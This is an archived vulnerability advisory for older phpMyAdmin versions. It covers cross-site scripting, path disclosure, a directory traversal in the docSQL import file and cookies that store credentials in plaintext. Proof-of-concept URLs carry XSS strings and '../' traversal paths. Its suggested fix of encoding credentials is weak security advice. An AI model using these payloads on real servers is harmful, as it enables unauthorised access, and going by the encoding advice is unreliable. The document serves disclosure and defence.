TUCoPS :: Web :: Adminware, Control Panels :: bt437.txt

phpMyAdmin XSS Vulnerabilities, Transversal Directory Attack , Information Encoding Weakness and Path Disclosures 




phpMyAdmin XSS Vulnerabilities, Transversal Directory Attack , 

Information Encoding Weakness and Path Disclosures

--------------------

Product: phpMyAdmin

Vendor: phpMyAdmin Development Team 

Versions:

         VULNERABLE

         

         - 2.5.2 CVS ( in Development )

         - 2.5.x

         - 2.4.x

         - 2.3.x

         - 2.2.x

         - 2.1.x

         - 2.0.x

         - 1.x.x

        

         NOT VULNERABLE

        

         - ?

Advisory: NSRG-15-7

---------------------



Description:



phpMyAdmin is a tool written in PHP intended to handle the administration 

of MySQL over the WWW. Currently it can create and drop databases, 

create/drop/alter tables, delete/edit/add fields, execute any SQL 

statement, manage keys on fields.





-----------------------------------------

SECURITY HOLES FOUND and PROOFS OF CONCEPT:

-----------------------------------------



I encountered Cross Site Scripting Vulnerabilities and Path Disclosures 

in some files of the phpMyAdmin

installation , with this files , sending a specially crafted url you can 

execute commands in the client

side only and show the local path of the phpMyAdmin installation. The 

failures are related to a input validation flaw

and a inproper configuration of php.ini and php configuration declare 

library ( declare_php.lib.php )in phpMyAdmin for the errors flags.

I encountered a very dangerous transversal directory attack in a docSQL 

import system too.

I discover that phpMyAdmin  don't encode the mysql user and password , it 

save the data in plain text without encoding !.



-------------------------------

|   XSS  AND PATH DISCLOSURES |

-------------------------------



The affected files of the XSS attack ( Cross Site Scripting ) and Path 

Disclosure are:



 - sql.php / sql.php3   - Path Disclosure & XSS-

 - pdf_schema.php       - Path Disclosure & XSS-

 - pdf_pages.php        - Path Disclosure & XSS-

 - ldi_table.php        - Path Disclosure & XSS-

 - mult_submits.inc.php - Path Disclosure & XSS-

 - chk_rel.php          - Path Disclosure -

 - db_create.php        - Path Disclosure -

 - db_datadict.php      - Path Disclosure & XSS-

 - db_details.php       - Path Disclosure -

 - db_details_common.php- Path Disclosure -

 - db_details_db_info.php - Path Disclosure -

 - db_details_export.php  - Path Disclosure -

 - db_details_structure.php - Path Disclosure -

 - db_printview.php     - Path Disclosure & XSS-

 - db_search.php        - Path Disclosure -

 - header_printview.inc.php - Path Disclosure -

 - ldi_check.php        - Path Disclosure -

 - read_dump.php        - Path Disclosure & XSS-

 - tbl_addfield.php     - Path Disclosure -

 - tbl_alter.php        - Path Disclosure -

 - tbl_create.php       - Path Disclosure -

 - tbl_dump.php         - Path Disclosure -

 - tbl_move_copy.php    - Path Disclosure -

 - tbl_printview.php    - Path Disclosure -

 - tbl_properties.inc.php - Path Disclosure -

 - tbl_properties.php   -Path Disclosure -

 - tbl_properties_common.php -Path Disclosure -

 - tbl_properties_export.php -Path Disclosure -

 - tbl_properties_links.php  -Path Disclosure -

 - tbl_properties_operations.php -Path Disclosure -

 - tbl_properties_options.php    -Path Disclosure -

 - tbl_properties_table_info.php -Path Disclosure -

 - tbl_query_box.php    -Path Disclosure -

 - tbl_relation.php     -Path Disclosure -

 - tbl_rename.php       -Path Disclosure -

 - tbl_replace.php      -Path Disclosure -

 - tbl_select.php       -Path Disclosure -



NOTE: The Path Disclosures occur when you access directly the affected 

file without any QUERY_STRING needing a valid session.

 The XSS can executed passing crafted query_strings to the php scripts , 

see Samples for more info about this.



VULNERABLE FILES TO PATH DISCLOSURES And XSS THAT DOESN'T NEED A VALID 

SESSION :



 - libraries/auth/[cookie.auth.lib.php] - Path Disclosure -

 - libraries/xpath/[XPath.class.php]    - Path Disclosure -

 - libraries/[ip_allow_deny.lib.php]    - Path Disclosure -

 - libraries/[select_lang.lib.php]      - Path Disclosure -

 - libraries/sqlparser.lib.php          - Path Disclosure -

 - libraries/db_table_exists.lib.php    - Path Disclosure -

 



-----------------------------------

| DIRECTORY TRANSVERSAL ATTACK &  |

| REMOTE LOCAL FILE RETRIEVING &  |

| REMOTE INTERNAL DIRECTORY LISTING

-----------------------------------



I found a dangerous transversal directory attack in the file called 

db_details_importdocsql.php ( file import

systems ) , i explain this failure in the Proof of Concept:



____Proof of Concept______



You must send a crafted request to the db_details_importdocsql.php file :



http://localhost/mysql/db_details_importdocsql.php?

submit_show=true&do=import&docpath=[YOUR TRANSVERSAL DIRECTORY ATTACK]



If you want to do a internal directory listing you must do this request:





http://localhost/mysql/db_details_importdocsql.php?

submit_show=true&do=import&docpath=../../../



With this request you can list the internal directories in the root dir 

in a win installation ( normally c:\ ).



Note that you can't request files ( only dirs ) with 

db_details_importdocsql.php if you attempt to get a file you get this 

message: This was not a Directory .



SAMPLE RESULT OF A CGI-BIN DIRECTORY LISTED WITH THIS ATTACK:



Server iamnottotallysecured.not



Ignoring the file  .



Ignoring the file  ..



Ignoring the file  phf.cgi // ;-)



Ignoring the file  dumpenv.pl



Ignoring the file  test-cgi // ;-)



Ignoring the file  testcgi.pl // ;-D



Ignoring the file  wwwboard.pl



Ignoring the file  count.cgi



Ignoring the file  php.cgi // ;-D



Ignoring the file  passwd.pl



Ignoring the file  admin.cgi



Ignoring the file  ftp.cgi



Ignoring the file  formmail.pl // ;-D



Ignoring the file  proxy.pl







_______

Samples:

"""""""

Note that this paths are from my personal server in my testing lab:



The target user or you must be logged in for run the attacks :



http://localhost/mysql/sql.php?sql_query=">..<h1>XSS ! Oh my God!</h1>



http://localhost/mysql/db_datadict.php?db=XSS



http://localhost/mysql/db_details_importdocsql.php?

submit_show=true&do=import&docpath=../../../BOOT.ini



http://localhost/mysql/read_dump.php?

db=nonexistent&sql_query="><h1>XSS</h1>



http://localhost/mysql/tbl_properties_links.php?

table_info_num_rows=10&url_query="><h1>XSS



------------------

| INFORMATION    |

|   ENCODING     |

|    WEAKNESS    |

------------------



phpMyAdmin doesn't use any encoding type like BASE64/RadiX64 , only saves 

the user data ( username and password too ) in plain text without any 

encoding.



The authentication token in the cookie is this:



pma_cookie_username=[UserName]; lang=[language]-iso-8859-1; 

pma_cookie_password=[your password]



A sample is:



pma_cookie_username=god; lang=en-iso-8859-1; 

pma_cookie_password=doesnotexist



-----------------

| SOLUTIONS ;-p |

-----------------



- First: Redefine the errors flags in php.ini to Off. [Path Disclosures]

- Second: Use a partial / secure encoding for athentication tokens like 

RadiX64 ( not very secure but an attacker 

can think that is a more secure algorithm , obscurity ;-D ) .

- Three: Review the db_details_importdocsql.php file for prevent 

transversal directory attacks and remote local directory listing.

-----------

| CONTACT |

-----------



Lorenzo Hernandez Garcia-Hierro

 --- Computer Security Analyzer ---

 --Nova Projects Professional Coding--

 PGP: Keyfingerprint

 B6D7 5FCC 78B4 97C1  4010 56BC 0E5F 2AB2

 ID: 0x9C38E1D7

 **********************************

 NSRGroup : http://security.novappc.com

  are you totally secured ?

 ______________________

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH